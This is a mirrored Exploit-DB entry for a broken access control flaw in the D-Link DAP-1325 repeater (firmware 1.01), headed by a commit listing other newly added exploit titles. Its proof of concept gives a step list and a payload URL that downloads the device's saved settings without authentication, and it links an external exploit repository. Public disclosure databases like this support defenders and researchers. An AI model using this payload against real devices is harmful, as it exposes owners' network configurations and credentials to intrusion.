bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51556.txt
Exploit-DB ef9b4e5962 DB: 2023-07-04 
20 changes to exploits/shellcodes/ghdb

TP-Link TL-WR940N V4 - Buffer OverFlow

D-Link DAP-1325 - Broken Access Control

Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

FuguHub 8.1 - Remote Code Execution

GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Rukovoditel 3.4.1 - Multiple Stored XSS

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

spip v4.1.10 - Spoofing Admin account

Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

WBCE CMS 1.6.1 - Open Redirect & CSRF
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS

WP AutoComplete 1.0.4 - Unauthenticated SQLi
2023-07-04 00:16:26 +00:00

33 lines
No EOL
865 B
Text
Raw Permalink Blame History

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on:All Platforms
1) Description
Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
IN MY CASE,
Tested repeater IP: http://192.168.0.21/
Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
2) Proof of Concept
Step 1: Go to
Repeater Login Page : http://192.168.0.21/
Step 2:
Add the payload to URL.
Payload:
http://{ip}/cgi-bin/ExportSettings.sh
Payload:
https://github.com/eeduardogoncalves/exploit
Reference in a new issue View git blame Copy permalink